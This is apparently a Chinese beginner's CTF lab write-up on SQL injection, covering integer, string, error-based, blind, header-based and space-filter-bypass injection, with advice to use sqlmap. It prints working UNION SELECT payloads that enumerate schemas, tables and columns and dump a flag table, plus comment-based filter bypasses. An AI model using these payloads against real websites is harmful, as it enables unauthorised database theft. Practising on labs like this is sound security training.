大家好!!!小菜鸡来了!!!
Ps:所有都可以用sqlmap直接跑!!!(注意参数level变更)
前置知识:
sql语法(mysql为准,不限于oracle,sqlsever)、
请求包格式含义、
bp或hackbar......
1.整数型注入:
技巧:
1.判断注入点:题目已经说了是整数型注入:?id=1 and 1=1,有回显。
过程:?id=1 and 1=1 ?id=1 and 1=2
2.判断列数:Order by爆出列数(有别的方法,本人更推荐order by!!!)
3.系统库搞起:脱库!!!
查库→查表→查列→查字段内容→flag
?id=-1 union select 3,database()
查当前数据库
-1 union select 3,group_concat(table_name) from information_schema.tables where table_schema="sqli"
查表
?id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='flag'
查列
?id=-1 union select 1,group_concat(flag) from sqli.flag
查字段内容
下面的图片,省略了其中几步骤,没有大的影响哦!!!
↓
2.字符型注入:
技巧:判断注入类型 ?id=1'and ’1’=’1’ ?id=1'and '1'='2
过程同上(整数型注入一样的!!!)
3.报错注入:
技巧:floor()、extractvalue()、updatexml(),报错得到数据库信息!!!
蓝队初级面试常考这三个函数!!!
(不是我水!!!理解这几个函数就行了,我也背不下,但是简单的!!!多看看函数的各种参数就行了!!!)
绝招:sqlmap!!!
4.布尔盲注:
技巧:爆出数据库名的长度!!!然后慢慢用substr()函数截断,通过二分法进行ASCII码爆破。因为很繁琐,所以建议用sqlmap跑会快很多!!!
5.时间盲注:
技巧:其实就是sleep()函数的应用,但是手注不准确!!!
(手注的话基本没方法,都是用脚本或者sqlmap还有bp!!!)
推荐:cthub——时间盲注_ctfhub 时间盲注-CSDN博客
6.MySQL结构:
技巧:sqlmap大法!!!
7.Cookie注入、UA注入、Refer注入:
有三种方式,一种是bp抓包注入,一种是sqlmap,一种是跑脚本。
技巧:bp抓包找到注入点,直接注入即可跟整数型、字符型一样做!!!
8.过滤空格:
空格过滤,常用绕过空格过滤的方法:/**/、()、%0a(这个是换行)
1/**/and/**/1=1
推荐:“绕过的各种方式”:
https://blog.csdn.net/weixin_66839513/article/details/137018642?id=
9.综合训练 SQLI-LABS
技巧:当一次脚本小子没问题的!!!
这里手动注入看前面的你就没问题了!!!
大家!!!下一期写什么好啊?CTFhub系列?框架漏洞?信息收集?还是0day?哈哈哈哈哈(本人还是小菜鸡!!!)......